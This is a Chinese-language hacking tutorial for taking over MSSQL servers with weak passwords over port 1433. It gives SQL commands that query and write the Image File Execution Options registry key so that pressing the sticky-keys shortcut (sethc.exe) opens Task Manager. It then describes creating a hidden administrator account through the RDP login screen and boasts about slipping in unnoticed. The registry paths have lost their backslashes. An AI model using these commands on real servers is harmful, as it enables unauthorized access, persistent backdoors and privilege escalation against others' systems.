1433弱口令映像劫持后门快速提权法

提权条件:
1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)
2.服务器的粘滞键功能无损,只要可以正常弹出即可
3.服务器未禁止注册表编辑(即写入功能)

罗嗦一句:1433提权没有一种方法是万能,有时要多种方法结合,管理员的安全意识都在提高,现在没有几年前那么单纯的cmdshll就能提起来的了

开始sqltools登录目标服务器:
运行工具的dos命令,发现Error Message:xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）在以前的授渔课程中说过这是cmd.exe的权限被限制了也提供了绕过的方法,在此不再赘述,请看以前的教程




下面收集下服务器的相关资料和信息,以备提权使用

sql命令查询服务器的版本等相关信息:EXEC xp_msver




由于组件xplog70.dll被删除了,无法显示,下面再看下终端信息

sql命令读取服务器终端端口:exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-
Tcp','PortNumber'




终端端口为3389,连接测试终端端口,并测试shift粘滞键功能




连接正常,粘滞键测试正常弹出,再去收集下其他信息


 

c盘下有sql的安装目录,这个可是好东西,以前授渔也讲过请自行查阅

下面这里是这课的核心重点了,请十二万分关注
先发布三条命令

1.sql命令查询注册表粘滞键是否被劫持

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','Debugger'

2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe', 
'Debugger','REG_SZ','C:WINDOWSsystem32 askmgr.exe'

3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe'

好了,我们替换后查询一下看看是否正确写入注册表了




查询结果显示正常写入,下面就连接终端,五次shift,弹出可爱的任务管理器了,尊敬的管理员还在上面呢,他还不知道我们在悄悄的潜入进来了,太好玩了.


 

看下张图,点文件--新建任务,我们新建个explorer的任务


 

当程序运好后我们就看到了一个临时的桌面系统了,打开计算管理工具,什么?不会开?那位同学,你可要补习下电脑系统知识先了,我的电脑上右键,弹出菜单点管理啊

这时我们找到计算机管理工具里的本地用户和组,打开用户的选项,添加新账号和密码吧.


 

这里你也可以找到cmd命令去建立用户,当然,这时cmd的权限是被禁用的,还要改权限,比较麻烦,你也可以找其他目录下cmd.exe,有些权限设置得不好的,就可以执行了,这里
我们就用计算机管理来创建用户,就当是吃快餐面,方便嘛.跑题了跑题了******

接下来干吗?当然要把新建的账号添加到管理组了,用脚趾头想的人都知道*^_^*




一切KO了,不对应该是OK了,那么就终端登录吧,看看成果,嘿嘿,还不错的一台服务器.


 

http://www.spiger.cn/article/145.html

打开“开始”→“运行”，在“运行”一栏中输入“Rundll32 netplwiz.dll,UsersRunDll”命令打开用户帐户窗口（注意区分大小写）